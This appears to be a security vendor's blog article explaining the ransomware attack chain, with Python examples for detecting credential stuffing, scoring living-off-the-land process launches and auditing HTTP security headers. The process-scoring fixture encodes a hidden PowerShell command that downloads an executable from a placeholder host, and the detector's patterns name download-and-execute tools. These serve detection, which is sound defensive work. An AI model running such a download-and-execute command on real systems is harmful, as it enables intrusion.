Ransomware headlines focus on the encryption event — the moment files become inaccessible and a ransom note appears. But encryption is the final step in a chain that typically begins days or weeks earlier. Understanding the full attack chain reveals where defences fail and why web-facing infrastructure is increasingly the initial access vector.
Phase 1: Initial Access
Modern ransomware operators don't send mass phishing emails and hope for the best. They're organised groups that acquire initial access through specialised brokers or their own reconnaissance. The top initial access vectors in 2024-2025:
- Exploiting public-facing applications: VPN appliances, web servers, and application gateways with known vulnerabilities. The MOVEit, Citrix, and Fortinet campaigns each compromised thousands of organisations through a single vulnerability.
- Compromised credentials: Valid usernames and passwords obtained from breach databases, infostealers, or purchase from access brokers. This is credential stuffing applied to corporate infrastructure.
- Web application vulnerabilities: SQL injection, deserialization flaws, and SSRF in internet-facing applications provide direct access to internal networks.
The critical insight: initial access targets whatever is publicly exposed. Your website, API, VPN portal, and email infrastructure are the perimeter that ransomware operators probe first.
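The compromised-credentials vector above has a recognisable shape in a login log: one source address failing against many different accounts in a short window, and occasionally succeeding. The following Python is an added example written for this article, not ShieldReport's code; the log format is a constructed assumption (timestamp, source IP, username, result) standing in for whatever your web application or VPN portal actually emits, and the thresholds are starting points to tune, not published numbers.

```python
"""Flag credential stuffing in web login logs (added example; constructed input)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines (assumption): "<ISO timestamp> <source ip> <username> <LOGIN_OK|LOGIN_FAIL>"
SAMPLE_LOG = """\
2025-01-10T09:00:01 203.0.113.7 alice LOGIN_FAIL
2025-01-10T09:00:02 203.0.113.7 bob LOGIN_FAIL
2025-01-10T09:00:02 203.0.113.7 carol LOGIN_FAIL
2025-01-10T09:00:03 203.0.113.7 dave LOGIN_FAIL
2025-01-10T09:00:03 203.0.113.7 erin LOGIN_FAIL
2025-01-10T09:00:04 203.0.113.7 frank LOGIN_OK
2025-01-10T09:00:10 198.51.100.4 alice LOGIN_FAIL
2025-01-10T09:00:15 198.51.100.4 alice LOGIN_FAIL
2025-01-10T09:00:20 198.51.100.4 alice LOGIN_OK
2025-01-10T09:05:00 192.0.2.9 grace LOGIN_OK
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (LOGIN_OK|LOGIN_FAIL)$")


def parse_events(text):
    """Return (timestamp, ip, user, succeeded) tuples; malformed lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, ip, user, result = m.groups()
        events.append((datetime.fromisoformat(ts), ip, user, result == "LOGIN_OK"))
    return events


def detect_credential_stuffing(events, window=timedelta(minutes=5),
                               min_failures=5, min_users=4):
    """Sliding window per source IP: alert when it fails against many distinct
    accounts inside `window`. A single account hammered from one IP is brute
    force, not stuffing, and is deliberately not matched here.
    Returns {ip: {"failures": n, "users": k, "successes": [accounts]}}; the
    successes are the accounts to reset first, since a hit after a spray means
    the attacker now holds a valid credential."""
    by_ip = defaultdict(list)
    for ts, ip, user, ok in sorted(events):
        by_ip[ip].append((ts, user, ok))
    alerts = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            window_evs = evs[start:end + 1]
            failed = [e for e in window_evs if not e[2]]
            users = {e[1] for e in failed}
            if len(failed) >= min_failures and len(users) >= min_users:
                successes = sorted({e[1] for e in window_evs if e[2]})
                alerts[ip] = {"failures": len(failed), "users": len(users),
                              "successes": successes}
    return alerts


if __name__ == "__main__":
    for ip, info in detect_credential_stuffing(parse_events(SAMPLE_LOG)).items():
        print(ip, info)
```

Run against the sample, only 203.0.113.7 is flagged: five failures across five accounts in three seconds, followed by a success on `frank`. The second address fails twice against a single account and is left alone, which is the distinction that keeps this rule from paging on a user who mistyped a password.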
Phase 2: Establishing Persistence
Once inside, the attacker's priority is survival. They install backdoors, create new accounts, and deploy remote access tools. Modern ransomware groups use legitimate system administration tools — PowerShell, WMI, PsExec, RDP — to blend in with normal traffic. This "living off the land" approach evades most endpoint detection.
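"Living off the land" evades signature-based detection because the binaries are legitimate, so detection has to key on how they are launched: the parent process, the command-line switches, and what an encoded command decodes to. The Python below is an added example for this article, not ShieldReport's product or any EDR vendor's rule set; the event field names (`image`, `parent`, `cmdline`) and the scores are assumptions, and the three events are constructed.

```python
"""Score process-creation events for living-off-the-land patterns (added example)."""
import base64
import re


def encode_ps(command):
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE command text."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


# Constructed events. Field names are an assumption, not a real EDR schema;
# the host in event 1 is a placeholder (.invalid TLD), not a real indicator.
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_ps(
         "Invoke-WebRequest http://placeholder.invalid/x -OutFile C:\\Temp\\x.exe")},
    {"id": 2, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"id": 3, "image": r"C:\Windows\PSEXESVC.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "cmdline": "C:\\Windows\\PSEXESVC.exe"},
]

# Parents that rarely spawn PowerShell in normal administration (WMI remote exec,
# PsExec service, Office applications).
SUSPICIOUS_PARENTS = {"wmiprvse.exe", "psexesvc.exe", "winword.exe", "excel.exe", "outlook.exe"}
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev):
    """Return (score, reasons). Each indicator is weak alone; the sum is the signal."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    parent = ev["parent"].rsplit("\\", 1)[-1].lower()
    cmd = ev["cmdline"].lower()
    score, reasons = 0, []
    if image in ("psexesvc.exe", "psexec.exe"):
        score += 3
        reasons.append("PsExec service/binary")
    if parent in SUSPICIOUS_PARENTS:
        score += 3
        reasons.append(f"parent {parent}")
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is not None:
            score += 3
            reasons.append("encoded command: " + decoded)
            cmd += " " + decoded.lower()  # match the later rules on the decoded text too
        if re.search(r"-w(?:indowstyle)?\s+hidden", cmd):
            score += 2
            reasons.append("hidden window")
        if re.search(r"-nop(?:rofile)?\b", cmd):
            score += 1
            reasons.append("profile bypass")
        if re.search(r"invoke-webrequest|downloadstring|iex\b|invoke-expression", cmd):
            score += 2
            reasons.append("web download / dynamic execution")
    return score, reasons


def triage(events, threshold=5):
    """Events at or above the threshold, keyed by id."""
    return {ev["id"]: score_event(ev) for ev in events if score_event(ev)[0] >= threshold}


if __name__ == "__main__":
    for event_id, (score, reasons) in triage(EVENTS).items():
        print(event_id, score, reasons)
```

The decoding step is the part worth copying: a hidden-window, profile-bypassing PowerShell spawned by the WMI provider host scores high on its own, but only after decoding the UTF-16LE payload does the rule see the download instruction and the analyst see what the operator actually ran. The scheduled backup script launched from Explorer scores zero, and a lone PsExec service installation sits below the threshold until it combines with something else.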
Phase 3: Reconnaissance and Lateral Movement
The attacker maps the internal network, identifies domain controllers, locates backup systems, and catalogues high-value data. They move laterally using harvested credentials, pass-the-hash attacks, and exploitation of internal services that were never designed to face adversarial conditions.
This phase typically takes 3-21 days. The attacker is patient because the payoff — a complete encryption event — requires comprehensive access. Encrypting one workstation generates a small ransom; encrypting the entire domain infrastructure generates millions.
Phase 4: Data Exfiltration
Double extortion — now the dominant ransomware model — means the attacker steals data before encrypting it. If the victim restores from backups and refuses to pay, the attacker threatens to publish the stolen data. This makes backups insufficient as a ransomware defence; the data still leaks.
Exfiltration often uses legitimate cloud storage services (Mega, OneDrive, or even the victim's own cloud accounts) to avoid triggering network monitoring alerts.
Phase 5: Encryption Deployment
With maximum access and data exfiltrated, the attacker deploys the ransomware payload. Modern variants are designed for speed: parallel processing, partial file encryption (encrypting just enough of each file to make it irrecoverable), and targeting of backup systems, shadow copies, and recovery partitions.
The encryption event happens in minutes. By the time anyone notices, it's complete.
The Web-Facing Connection
The part of this chain that gets insufficient attention is initial access through web-facing infrastructure. A website leaking server version information helps attackers identify exploitable software. Missing security headers suggest a team that's under-invested in security, implying internal defences are likely weak too. Exposed admin panels, verbose error pages, and weak TLS configurations are the reconnaissance signals that access brokers catalogue and sell.
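Two of those signals, version disclosure and missing security headers, can be checked from a single HTTP response. The audit below is an added example written for this article and is not ShieldReport's scanner; the two header sets are constructed to show a leaky response beside a hardened one, and the header list and the one-year HSTS floor are this example's choices rather than a standard the page cites. `fetch_headers` is included so the same checks can be pointed at a live host, but the offline checks never call it.

```python
"""Audit HTTP response headers for version disclosure and missing hardening (added example)."""
import re
import urllib.request

# Constructed responses standing in for what two different servers returned.
LEAKY = {
    "Server": "Apache/2.4.29 (Ubuntu)",
    "X-Powered-By": "PHP/7.2.24",
    "Content-Type": "text/html; charset=UTF-8",
}
HARDENED = {
    "Server": "Apache",
    "Content-Type": "text/html; charset=UTF-8",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
    "X-Content-Type-Options": "nosniff",
    "Referrer-Policy": "strict-origin-when-cross-origin",
}

VERSION_RE = re.compile(r"\d+\.\d+")
DISCLOSING = ("server", "x-powered-by", "x-aspnet-version", "x-generator")
REQUIRED = ["Strict-Transport-Security", "Content-Security-Policy",
            "X-Content-Type-Options", "Referrer-Policy"]
ONE_YEAR = 31536000


def audit_headers(headers):
    """Return a list of human-readable findings; an empty list means nothing to report."""
    h = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
    findings = []
    for name in DISCLOSING:
        if name in h and VERSION_RE.search(h[name]):
            findings.append(f"version disclosure in {name}: {h[name]}")
    for name in REQUIRED:
        if name.lower() not in h:
            findings.append(f"missing {name}")
    hsts = h.get("strict-transport-security", "")
    m = re.search(r"max-age=(\d+)", hsts)
    if hsts and (not m or int(m.group(1)) < ONE_YEAR):
        findings.append("HSTS max-age below one year")
    csp = h.get("content-security-policy", "")
    if csp and "frame-ancestors" not in csp and "x-frame-options" not in h:
        findings.append("no clickjacking protection (frame-ancestors / X-Frame-Options)")
    if "x-content-type-options" in h and h["x-content-type-options"].lower() != "nosniff":
        findings.append("X-Content-Type-Options is not 'nosniff'")
    return findings


def fetch_headers(url):
    """Fetch live headers with a HEAD request. Network access; not used by the offline checks."""
    req = urllib.request.Request(url, method="HEAD")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return dict(resp.headers.items())


if __name__ == "__main__":
    for label, hdrs in (("leaky", LEAKY), ("hardened", HARDENED)):
        print(label, audit_headers(hdrs) or ["no findings"])
```

On the leaky response the audit reports the Apache and PHP versions and the four absent headers; on the hardened one it reports nothing. The version strings are exactly what an access broker's scanner matches against a vulnerability feed, so stripping them is cheap and removes the first hop of the chain described above.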
ShieldReport hardens your web-facing infrastructure — the perimeter that ransomware operators probe during initial reconnaissance — so your domain doesn't signal vulnerability to automated scanning tools.